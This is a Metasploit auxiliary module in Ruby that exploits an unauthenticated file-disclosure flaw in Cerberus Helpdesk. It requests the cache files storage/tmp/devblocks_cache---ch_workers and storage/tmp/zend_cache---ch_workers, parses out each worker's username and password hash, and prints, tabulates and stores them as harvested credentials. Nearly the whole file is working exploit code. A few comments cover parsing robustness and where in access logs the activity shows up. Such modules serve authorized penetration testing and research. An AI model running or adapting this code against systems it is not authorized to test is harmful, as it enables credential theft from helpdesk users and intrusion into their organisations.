GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
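class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Module metadata and options. The only user-tunable setting is TARGETURI
  # (the helpdesk web root, default '/'); the cache file names probed by
  # run_host are fixed.
  def initialize
    super(
      'Name' => 'Cerberus Helpdesk User Hash Disclosure',
      'Description' => %q{
        This module extracts usernames and password hashes from the Cerberus Helpdesk
        through an unauthenticated access to a workers file.
        Verified on Version 4.2.3 Stable (Build 925) and 5.4.4
      },
      'References' =>
        [
          [ 'EDB', '39526' ]
        ],
      'Author' =>
        [
          'asdizzle_', # discovery
          'h00die', # module
        ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Mar 7 2016'
    )

    register_options(
      [
        OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])
      ]
    )
  end

  # Scanner callback, invoked once per target host.
  #
  # Requests <TARGETURI>/storage/tmp/<site>_cache---ch_workers for
  # site = devblocks, then zend. The first response whose body contains the
  # marker 'pass' is parsed, every recovered username/hash pair is printed,
  # stored as a non-replayable hash and tabulated, and the remaining candidate
  # is skipped. An unanswered request or a body without the marker is reported
  # and the next candidate is tried. The exposure condition is that this cache
  # file is reachable without authentication under the web root, so requests
  # for storage/tmp/ in the web server's access log are the obvious place to
  # look for this activity.
  #
  # @param rhost [String] target host, supplied by the Scanner mixin
  # @return [void]
  def run_host(rhost)
    ['devblocks', 'zend'].each do |site|
      url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")
      vprint_status("Attempting to load data from #{url}")
      res = send_request_cgi({ 'uri' => url })
      unless res
        print_error("#{peer} Unable to connect to #{url}")
        next
      end

      # NOTE(review): a substring match is a weak validity check; any page whose
      # body happens to contain 'pass' (e.g. a custom error page) is accepted.
      unless res.body.include?('pass')
        print_error("Invalid response received for #{peer} for #{url}")
        next
      end

      cred_table = Rex::Text::Table.new(
        'Header' => 'Cerberus Helpdesk User Credentials',
        'Indent' => 1,
        'Columns' => ['Username', 'Password Hash']
      )

      extract_credentials(res.body).each do |username, password_hash|
        print_good("Found: #{username}:#{password_hash}")
        store_valid_credential(
          user: username,
          private: password_hash,
          private_type: :nonreplayable_hash
        )
        cred_table << [username, password_hash]
      end

      print_line
      print_line cred_table.to_s
      break
    end
  rescue ::Rex::ConnectionError
    print_error("#{peer} Unable to connect to site")
  end

  private

  # Pulls [username, password_hash] pairs out of the raw cache body.
  #
  # The body looks json-ish but is not JSON (it resembles PHP serialize()
  # output, though the original author left the format unconfirmed), so this
  # is a rough equivalent of
  #   sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'
  # Each 's:5' chunk that mentions 'email' is split on ':'; field 3 holds the
  # username (quotes, semicolons and a trailing 's' stripped) and field 7 the
  # hash (quotes and semicolons stripped). A chunk with fewer than 8 fields is
  # skipped rather than raising NoMethodError on nil, which previously aborted
  # the whole host.
  #
  # @param body [String] raw HTTP response body
  # @return [Array<Array(String, String)>] one [username, hash] pair per record
  def extract_credentials(body)
    body.split('s:5').each_with_object([]) do |chunk, pairs|
      next unless chunk.include?('email')

      fields = chunk.split(':')
      raw_user = fields[3]
      raw_hash = fields[7]
      next unless raw_user && raw_hash

      username = raw_user.tr('";', '')[0...-1] # remove extra characters and the trailing s
      password_hash = raw_hash.tr('";', '') # remove extra characters
      pairs << [username, password_hash]
    end
  end
end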